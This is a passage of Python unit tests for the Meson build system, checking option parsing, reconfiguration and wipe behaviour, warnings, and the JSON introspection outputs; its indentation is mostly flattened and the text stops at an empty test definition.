self.assertNotEqual(0, cm.exception.returncode)
self.assertIn(msg, cm.exception.output)
else:
self.assertIn(msg, str(cm.exception))
self.wipe()
        # It is not an error to set a wrong option for unknown subprojects or
        # languages because we have no control over which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('set_percent_opt')].value, 'myoption%')
self.wipe()
        # Setting the same option a 2nd time should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar',
'-Db_lundef=false', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('bindir')].value, 'bar')
self.assertEqual(obj.options[OptionKey('buildtype')].value, 'release')
self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'thread')
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('bindir')].value, 'foo')
self.assertEqual(obj.options[OptionKey('buildtype')].value, 'plain')
self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'address')
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo'])
self.wipe()
except KeyError:
            # Ignore KeyError: it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '208 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
                with open(mfile, 'w') as of:
                    of.write("project('foobar', 'c')\n")
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['optimization'], '0')
self.setconf('-Doptimization=g')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['optimization'], 'g')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '158 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
        # Run the wipe from inside the build directory; note that a bare
        # ``with Path(...)`` block does not actually change directory.
        self.init(testdir, extra_args=['--wipe'], workdir=self.builddir)
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
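        # The expected ids below have the form '<short path hash>@@<name><suffix>'.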
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '34 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '41 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '44 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
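        # All subprojects, including implicitly discovered and nested ones,
        # must show up in --projectinfo with their name and version.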
testdir = os.path.join(self.common_test_dir, '99 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
{
'descriptive_name': 'subsub',
'name': 'subsub',
'version': 'undefined'
},
{
'descriptive_name': 'subsubsub',
'name': 'subsubsub',
'version': 'undefined'
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
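        # Each target must report the subproject it was defined in
        # (None for targets of the main project).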
testdir = os.path.join(self.common_test_dir, '43 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '76 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '76 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
            raise unittest.SkipTest('Clang-format is currently only supported with the Ninja backend, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
            raise unittest.SkipTest('Clang-tidy is currently only supported with the Ninja backend, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
dummydir = os.path.join(testdir, 'dummydir.h')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
self.assertNotIn(dummydir, out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
        # Do a build that generates a cross file describing this very machine
        # as the host machine.
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
# XXX: These now generate in a different order, is that okay?
self.assertListEqual(sorted(res_nb, key=lambda x: x['name']), sorted(res_wb, key=lambda x: x['name']))
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_buildoptions_cross_only(self):
testdir = os.path.join(self.unit_test_dir, '84 cross only introspect')
testfile = os.path.join(testdir, 'meson.build')
res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
optnames = [o['name'] for o in res]
self.assertIn('c_args', optnames)
self.assertNotIn('build.c_args', optnames)
def test_introspect_json_dump(self):
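        # Every intro-*.json file written to meson-info must exist and each
        # entry must carry the expected keys with the expected types.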
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj, strict: bool = True):
for i in key_type_list:
if isinstance(i[1], (list, tuple)) and None in i[1]:
i = (i[0], tuple([x for x in i[1] if x is not None]))
if i[0] not in obj or obj[i[0]] is None:
continue
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
if strict:
for k in obj.keys():
found = False
for i in key_type_list:
if k == i[0]:
found = True
break
self.assertTrue(found, 'Key "{}" not in expected list'.format(k))
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
('depends', list),
('workdir', (str, None)),
('priority', int),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
('choices', (list, None)),
('value', (str, int, bool, list)),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('extra_files', list),
('subproject', (str, None)),
('install_filename', (list, None)),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Match target ids to input and output files for ease of reference
src_to_id = {}
out_to_id = {}
for i in res['targets']:
            # Dump each target to stdout to ease debugging of the assertions below.
            print(json.dumps(i))
out_to_id.update({os.path.relpath(out, self.builddir): i['id']
for out in i['filename']})
for group in i['target_sources']:
src_to_id.update({os.path.relpath(src, testdir): i['id']
for src in group['sources']})
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]}
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertEqual(sorted(i['depends']),
sorted(deps_to_find[i['name']]))
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i, strict=False)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
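        # The combined `meson introspect --all` output must match the
        # individual intro-*.json files on disk.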
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
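        # Changing options through `meson configure` must update
        # intro-buildoptions.json to the new values.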
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in res1:
if i['name'] == 'cpp_std':
i['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
i['value'] = 'c++14'
if i['name'] == 'buildtype':
i['value'] = 'release'
if i['name'] == 'optimization':
i['value'] = '3'
if i['name'] == 'debug':
i['value'] = False
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
res_wb = [i for i in res_wb if i['type'] != 'custom']
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_ast_source(self):
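        # The --ast introspection output must be a well-formed node tree;
        # accept_node() below validates every node against the per-node
        # schema defined in `nodes`.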
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--ast'] + self.meson_args)
node_counter = {}
def accept_node(json_node):
self.assertIsInstance(json_node, dict)
for i in ['lineno', 'colno', 'end_lineno', 'end_colno']:
self.assertIn(i, json_node)
self.assertIsInstance(json_node[i], int)
self.assertIn('node', json_node)
n = json_node['node']
self.assertIsInstance(n, str)
self.assertIn(n, nodes)
if n not in node_counter:
node_counter[n] = 0
node_counter[n] = node_counter[n] + 1
for nodeDesc in nodes[n]:
key = nodeDesc[0]
func = nodeDesc[1]
self.assertIn(key, json_node)
if func is None:
tp = nodeDesc[2]
self.assertIsInstance(json_node[key], tp)
continue
func(json_node[key])
def accept_node_list(node_list):
self.assertIsInstance(node_list, list)
for i in node_list:
accept_node(i)
def accept_kwargs(kwargs):
self.assertIsInstance(kwargs, list)
for i in kwargs:
self.assertIn('key', i)
self.assertIn('val', i)
accept_node(i['key'])
accept_node(i['val'])
nodes = {
'BooleanNode': [('value', None, bool)],
'IdNode': [('value', None, str)],
'NumberNode': [('value', None, int)],
'StringNode': [('value', None, str)],
'ContinueNode': [],
'BreakNode': [],
'ArgumentNode': [('positional', accept_node_list), ('kwargs', accept_kwargs)],
'ArrayNode': [('args', accept_node)],
'DictNode': [('args', accept_node)],
'EmptyNode': [],
'OrNode': [('left', accept_node), ('right', accept_node)],
'AndNode': [('left', accept_node), ('right', accept_node)],
'ComparisonNode': [('left', accept_node), ('right', accept_node), ('ctype', None, str)],
'ArithmeticNode': [('left', accept_node), ('right', accept_node), ('op', None, str)],
'NotNode': [('right', accept_node)],
'CodeBlockNode': [('lines', accept_node_list)],
'IndexNode': [('object', accept_node), ('index', accept_node)],
'MethodNode': [('object', accept_node), ('args', accept_node), ('name', None, str)],
'FunctionNode': [('args', accept_node), ('name', None, str)],
'AssignmentNode': [('value', accept_node), ('var_name', None, str)],
'PlusAssignmentNode': [('value', accept_node), ('var_name', None, str)],
'ForeachClauseNode': [('items', accept_node), ('block', accept_node), ('varnames', None, list)],
'IfClauseNode': [('ifs', accept_node_list), ('else', accept_node)],
'IfNode': [('condition', accept_node), ('block', accept_node)],
'UMinusNode': [('right', accept_node)],
'TernaryNode': [('condition', accept_node), ('true', accept_node), ('false', accept_node)],
}
accept_node(res_nb)
for n, c in [('ContinueNode', 2), ('BreakNode', 1), ('NotNode', 3)]:
self.assertIn(n, node_counter)
self.assertEqual(node_counter[n], c)
def test_introspect_dependencies_from_source(self):
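        # --scan-dependencies on an unconfigured source tree must report every
        # dependency() call with its requirement status, version constraints
        # and fallback information.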
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
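        # The alias target must not be built by default; invoking it
        # explicitly must build all of its dependencies.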
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
